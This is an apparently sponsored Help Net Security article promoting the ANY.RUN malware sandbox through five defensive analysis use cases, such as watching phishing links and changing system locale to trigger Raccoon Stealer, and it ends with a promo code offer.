5 use cases with a malware sandbox - Help Net Security

5 use cases with a malware sandbox – Help Net Security

Malware attacks are now commonplace, executing in minutes and causing damage for weeks or months. Rapid detection and fast, effective incident response are critical in this situation.

Today we will discuss five use cases how a malware sandbox can help, so you can avoid all threats and find out the truth behind insidious files.

What is a malware sandbox?

A company’s security system includes several layers of protection. A sandbox is one of the stages and the modern security system would be incomplete without it. The tool helps solve digital forensics and incident response tasks.

A malware sandbox is a tool for running suspicious programs in the virtual environment, safe for your computer. And an interactive service allows any manipulations with the analyzed sample and the operating system inside the virtual machine. You can work with a suspicious sample directly as if you had it open on your PC: click, open, restart.

There are situations when malicious files or a link remain dormant or do not show their true nature. And using other security tools is insufficient or time-consuming.

For example, some malware samples only run when certain conditions are met.

  • Banking Trojans can be activated when a user visits a specific online banking website. And thanks to the interactivity, analysts can collect more indicators of compromise.
  • Some malware contains files with unique names or registry keys. Cybersecurity specialists can add them in a sandbox to get more IOCs: check maldoc language, change system locale and restart tasks.
  • Working directly with a pattern allows testing multiple variants. This allows analysts to get data quickly.

Let’s find out how the tool handles malicious files and links using ANY.RUN online malware sandbox.

Use Case 1. Follow malicious link and files in real-time

The first step when you receive an email with a link or attachment is to stop and do nothing. Then look carefully: spelling mistakes, the sender name, greetings, the file name. Once you decide it might be a scam, you go straight to a sandbox.

Here you can open files and follow links in a completely safe environment. And securely check where it’s going and what files are downloading in real-time.

If you enter your username and password, you will be redirected to the original page in the task with questionable content. But all the data has already been stolen. The sandbox gives you details of where the traffic went and what URL was opened. ANY.RUN intercepts packets containing the data stolen and transmitted by malware, including credentials.

Use malware sandbox

Use case 2. Network stream analysis of malicious files and links

Imagine you have a PDF file with an image or text bait. You click a link and get an invitation to download a file with a long name or extra underscores.

Once the file is open, you have installed malware that can steal sensitive information, or it may be part of a more serious attack such as B. ransomware.

The network stream example shows how Mass Logger sends the authorization information in clear text. Copy and paste domain name, login and password and collect information about the infected systems.

ANY.RUN

Use case 3. Local change analysis

Several malware programs stop working if the system lacks a certain language, time or currency.

For example, in the Raccoon Stealer example, if you selected the Belarus (be-BY) locale, all processes were terminated.

We restart the task and change the locale to the United States (en-US). Immediately after detection, activities increase: the Raccoon malware exchanges information over the network and modifies certificate settings.

A simple change of the locale brought good results: in one case the malware does not run, in the other it shows its malicious properties.

Use malware sandbox

Use case 4. Restart support

Some malware families only enter the active phase after a system reboot to avoid detection. By restarting the operating system with ANY.RUN, analysts can identify a cyber threat, observe malware behavior and collect additional indicators of compromise.

The downloaded executable in Nanocore’s example adds itself to the startup folder and stops the operating system from running. This simple trick is often used to bypass virus detection.

After the y6s2gl.exe process was added to a launch, all processes’ activities stopped. But when we reboot the system, the malicious file runs successfully and is detected as Nanocore.

ANY.RUN

Use case 5. Instant access to analysis and fast results

IT security specialists must react as quickly as possible when an incident occurs. Time is of the essence. And the first step to improved security is fast malware analysis results.

The Agent Tesla sample file contains malware. ANY.RUN provides instant access to analysis, and the virtual machine starts immediately, allowing you to change the analysis vector in the current session.

A specialist monitors the created process and collects all information in real time.

And here’s a quick analysis: 10 seconds is enough to identify Agent Tesla and extract its configuration data from the dump.

Use malware sandbox

These use cases will help uncover even advanced malware and ensure your data is safe – use promo code and run all files and links in ANY.RUN online malware sandbox.

Write promo code “HELPNET” to support@any.run with your business email address and get 14 days ANY.RUN Premium Subscription for free!

Hackers use different strategies and brand names to attack. To quickly identify the scam, you need to review suspicious content. Don’t fall for malware tricks and don’t trust files and links. Use a sandpit and stay safe.

#cases #malware #sandbox #Net #Security

Leave a Comment

Your email address will not be published. Required fields are marked *